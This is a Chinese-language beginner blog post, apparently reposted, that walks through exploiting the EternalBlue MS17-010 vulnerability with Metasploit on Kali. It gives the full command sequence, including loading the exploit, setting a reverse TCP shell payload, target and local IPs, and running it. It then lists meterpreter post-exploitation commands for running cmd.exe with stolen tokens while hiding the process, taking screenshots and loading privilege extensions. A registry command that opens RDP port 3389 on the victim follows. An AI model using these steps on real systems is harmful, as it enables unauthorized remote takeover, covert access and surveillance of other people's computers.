Metasploit利用永恆之藍MS17-010 基礎


本人太渣,所以寫了這個基礎篇供一些小白和新手看,大佬們手下留情。

這是個基礎篇。。。。。

這幾天在培訓第一次接觸Metasploit,沒有我原來想象中那么麻煩,真的上手很方便  嘻嘻嘻嘻~~~~o(* ̄▽ ̄*)o

kali集成了Metasploit,所以我用的我是kali。打開kali終端,輸入msfconsole.等待Metasploit加載。成功之后終端前面會變成這樣:msf>

以下是命令以及解釋:msf>search ms17-010

//查找metasploit框架中的滲透攻擊模塊。

msf > use  XXX    //裝載一個滲透攻擊或模塊

msf > show payloads

//輸出很多可用的攻擊載荷

msf > set payload windows/shell_reverse_tcp        //指定想要使用的攻擊載荷。反彈型的鏈接方式,可以繞過防火牆

 

msf > set RHOST 滲透目標主機的IP地址

 

msf > set LHOST 本機IP

 

msf >show targets

輸出各種版本的操作系統代號,根據目標操作系統版本選擇。

msf >set target XX

 

msf >show options                    //輸出設置清單,可進行修正

 

msf >exploit  或者  run           //沒有錯誤,即可進行攻擊了。

進去之后顯示 meterpret

分割線啦啦啦啦~~~~~~


常用命令:

execute -f cmd.exe -i              執行cmd.exe命令並進行交互。

execute -f cmd.exe -i -t           以所有可用令牌來執行cmd命令。

execute -f cmd.exe -i -H -t      以所有可用令牌來執行cmd命令並隱藏該進程。

screenshot                              對目標主機的屏幕進行截圖。

use priv                                   加載特權提升擴展模塊,來擴展meterpreter庫。

開啟3389端口命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
我實例多次,對Windows XP 和2003系統有用的,不用重起,只要對方是外網,行后方可連接3389終端


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM